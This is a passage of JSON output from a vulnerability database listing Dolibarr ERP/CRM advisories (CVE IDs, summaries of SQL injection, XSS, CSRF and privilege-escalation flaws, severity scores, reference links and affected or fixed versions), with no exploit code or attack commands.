ID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0414","GHSA-f768-8pvq-mm6r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fvp2-wtsw-y7ee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/51787?format=json","vulnerability_id":"VCID-ggum-7ajh-nkdn","summary":"Dolibarr vulnerable to privilege escalation\nDolibarr Open Source ERP & CRM for Business before v14.0.1 allows attackers to escalate privileges via a crafted API.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138","reference_id":"","reference_type":"","scores":[{"value":"0.00337","scoring_system":"epss","scoring_elements":"0.56754","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138"},{"reference_url":"https://www.exploit-db.com/exploits/50248","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-30T14:07:50Z/"}],"url":"https://www.exploit-db.com/exploits/50248"},{"reference_url":"https://github.com/advisories/GHSA-gh7m-j673-wm97","reference_id":"GHSA-gh7m-j673-wm97","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gh7m-j673-wm97"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85235?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2022-43138","GHSA-gh7m-j673-wm97"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ggum-7ajh-nkdn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35730?format=json","vulnerability_id":"VCID-j1fh-3p2s-bfgk","summary":"Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"0.05006","scoring_system":"epss","scoring_elements":"0.89865","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888"},{"reference_url":"https://github.com/advisories/GHSA-62wf-h26v-5m57","reference_id":"GHSA-62wf-h26v-5m57","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-62wf-h26v-5m57"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38888","GHSA-62wf-h26v-5m57"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j1fh-3p2s-bfgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41483?format=json","vulnerability_id":"VCID-j4d1-8q47-uqc4","summary":"XSS in Dolibarr\nDolibarr before 11.0.4 allows XSS.","references":[{"reference_url":"http://packetstormsecurity.com/files/157752/Dolibarr-11.0.3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/157752/Dolibarr-11.0.3-Cross-Site-Scripting.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-13094","reference_id":"","reference_type":"","scores":[{"value":"0.01707","scoring_system":"epss","scoring_elements":"0.82629","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-13094"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/11.0.4/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/11.0.4/ChangeLog"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13094","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13094"},{"reference_url":"https://www.dolibarr.org/dolibarr-erp-crm-11-0-4-maintenance-release-for-branch-11-0-is-available.php","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/dolibarr-erp-crm-11-0-4-maintenance-release-for-branch-11-0-is-available.php"},{"reference_url":"https://github.com/advisories/GHSA-cxvr-r92m-q9hw","reference_id":"GHSA-cxvr-r92m-q9hw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxvr-r92m-q9hw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/75137?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8kn4-yfnc-sfaw"},{"vulnerability":"VCID-8q73-qf6x-zyde"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-ssn5-ht3p-3kgh"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"}],"aliases":["CVE-2020-13094","GHSA-cxvr-r92m-q9hw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j4d1-8q47-uqc4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/59059?format=json","vulnerability_id":"VCID-jrxu-cz7p-3uhe","summary":"Dolibarr SQL injection vulnerability\nSQL injection vulnerability in Dolibarr before 7.0.2 allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10094","reference_id":"","reference_type":"","scores":[{"value":"0.73712","scoring_system":"epss","scoring_elements":"0.98839","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10094"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/7ade4e37f24d6859987bb9f6232f604325633fdd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/7ade4e37f24d6859987bb9f6232f604325633fdd"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10094","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10094"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10094-dolibarr-sql-injection-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10094-dolibarr-sql-injection-vulnerability"},{"reference_url":"https://www.exploit-db.com/exploits/44805","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.exploit-db.com/exploits/44805"},{"reference_url":"https://www.exploit-db.com/exploits/44805/","reference_id":"","reference_type":"","scores":[],"url":"https://www.exploit-db.com/exploits/44805/"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/1","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/1"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/44805.txt","reference_id":"CVE-2018-10094","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/44805.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10094","GHSA-57wj-22w9-wm9r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jrxu-cz7p-3uhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/8389?format=json","vulnerability_id":"VCID-kvcg-cuxk-tbbk","summary":"Dolibarr vulnerable to Cross-Site Request Forgery\nIncorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-31503","reference_id":"","reference_type":"","scores":[{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.18098","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-31503"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-08-19T20:05:15Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-31503","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-31503"},{"reference_url":"https://github.com/advisories/GHSA-6ppg-rgrg-f573","reference_id":"GHSA-6ppg-rgrg-f573","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6ppg-rgrg-f573"}],"fixed_packages":[],"aliases":["CVE-2024-31503","GHSA-6ppg-rgrg-f573"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kvcg-cuxk-tbbk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14712?format=json","vulnerability_id":"VCID-m2e3-q7zb-uuhh","summary":"Dolibarr vulnerable to SQL Injection\nVulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters in /dolibarr/commande/list.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5315","reference_id":"","reference_type":"","scores":[{"value":"0.5717","scoring_system":"epss","scoring_elements":"0.98178","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5315"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5315","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5315"},{"reference_url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-05-24T14:11:03Z/"}],"url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms"},{"reference_url":"https://github.com/advisories/GHSA-q8x7-jc3h-p8xc","reference_id":"GHSA-q8x7-jc3h-p8xc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q8x7-jc3h-p8xc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"}],"aliases":["CVE-2024-5315","GHSA-q8x7-jc3h-p8xc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m2e3-q7zb-uuhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabi